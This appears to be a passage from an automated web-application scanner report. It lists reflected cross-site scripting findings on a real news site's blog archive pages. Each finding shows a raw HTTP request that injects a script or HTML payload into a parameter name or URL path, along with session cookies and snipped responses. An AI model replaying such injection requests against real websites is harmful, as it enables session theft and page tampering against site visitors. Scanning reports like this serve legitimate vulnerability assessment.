High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2009/05/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e06c"><script>alert(1)</script>a34eb2449ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2009/05/index.html?4e06c"><script>alert(1)</script>a34eb2449ea=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dde48"><a>0c58d78c4c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009dde48"><a>0c58d78c4c/06/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d397b"><a>e4384e6a732 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009/06d397b"><a>e4384e6a732/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<meta http-equ
...[SNIP]...
n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2009%2F06d397b%22%3E%3Ca%3Ee4384e6a732%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2009/06d397b"><a>e4384e6a732/index.html">
...[SNIP]...
3.355. http://www.darkreading.com/blog/archives/2009/06/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2009/06/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6f6c"><script>alert(1)</script>98e0b46ad07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2009/06/index.html?e6f6c"><script>alert(1)</script>98e0b46ad07=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b18af"><a>e49760590fc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009b18af"><a>e49760590fc/07/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c354c"><a>175fb79daf6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009/07c354c"><a>175fb79daf6/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2009%2F07c354c%22%3E%3Ca%3E175fb79daf6%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2009/07c354c"><a>175fb79daf6/index.html"> ...[SNIP]...
3.358. http://www.darkreading.com/blog/archives/2009/07/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/2009/07/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 784b8"><script>alert(1)</script>239cc57a97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2009/07/index.html?784b8"><script>alert(1)</script>239cc57a97=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6306c"><a>2ede6b99be3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/20096306c"><a>2ede6b99be3/08/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f4c"><a>51ce412cf5c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009/0882f4c"><a>51ce412cf5c/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2009%2F0882f4c%22%3E%3Ca%3E51ce412cf5c%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2009/0882f4c"><a>51ce412cf5c/index.html"> ...[SNIP]...
3.361. http://www.darkreading.com/blog/archives/2009/08/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/2009/08/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72a2f"><script>alert(1)</script>9fd35845f95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2009/08/index.html?72a2f"><script>alert(1)</script>9fd35845f95=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25a64"><a>3cc7fda8deb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/200925a64"><a>3cc7fda8deb/09/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3836"><a>6ae147884b0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009/09d3836"><a>6ae147884b0/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2009%2F09d3836%22%3E%3Ca%3E6ae147884b0%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2009/09d3836"><a>6ae147884b0/index.html"> ...[SNIP]...
3.364. http://www.darkreading.com/blog/archives/2009/09/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/2009/09/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dbda"><script>alert(1)</script>b5f60d1ad01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2009/09/index.html?7dbda"><script>alert(1)</script>b5f60d1ad01=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bb6c"><a>73282eaed25 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/20092bb6c"><a>73282eaed25/10/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a820f"><a>dfec57011e5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009/10a820f"><a>dfec57011e5/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2009%2F10a820f%22%3E%3Ca%3Edfec57011e5%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2009/10a820f"><a>dfec57011e5/index.html"> ...[SNIP]...
3.367. http://www.darkreading.com/blog/archives/2009/10/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/2009/10/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 250c0"><script>alert(1)</script>d317e3f751a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2009/10/index.html?250c0"><script>alert(1)</script>d317e3f751a=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc42f"><a>721b5667a63 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009cc42f"><a>721b5667a63/11/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8df01"><a>50ab033e38d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009/118df01"><a>50ab033e38d/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2009%2F118df01%22%3E%3Ca%3E50ab033e38d%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2009/118df01"><a>50ab033e38d/index.html"> ...[SNIP]...
3.370. http://www.darkreading.com/blog/archives/2009/11/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/2009/11/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6929a"><script>alert(1)</script>7208389ef75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2009/11/index.html?6929a"><script>alert(1)</script>7208389ef75=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dc42"><a>403c8fbebb2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/20099dc42"><a>403c8fbebb2/12/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75026"><a>e15ef152169 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009/1275026"><a>e15ef152169/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2009%2F1275026%22%3E%3Ca%3Ee15ef152169%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2009/1275026"><a>e15ef152169/index.html"> ...[SNIP]...
3.373. http://www.darkreading.com/blog/archives/2009/12/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/2009/12/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38ede"><script>alert(1)</script>c750fd6dd4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2009/12/index.html?38ede"><script>alert(1)</script>c750fd6dd4b=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdbb6"><a>9420fdb854e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2010cdbb6"><a>9420fdb854e/01/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... ogin?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2010cdbb6%22%3E%3Ca%3E9420fdb854e%2F01%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2010cdbb6"><a>9420fdb854e/01/index.html"> ...[SNIP]...
3.375. http://www.darkreading.com/blog/archives/2010/01/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/2010/01/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b052e"><script>alert(1)</script>f1e0e274828 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2010/01/index.html?b052e"><script>alert(1)</script>f1e0e274828=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98e6f"><a>28d57e52fcb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/201098e6f"><a>28d57e52fcb/02/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... ogin?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F201098e6f%22%3E%3Ca%3E28d57e52fcb%2F02%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/201098e6f"><a>28d57e52fcb/02/index.html"> ...[SNIP]...
3.377. http://www.darkreading.com/blog/archives/2010/02/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/2010/02/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66c98"><script>alert(1)</script>3087b58a38d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2010/02/index.html?66c98"><script>alert(1)</script>3087b58a38d=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ccff"><a>fb2a6948865 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
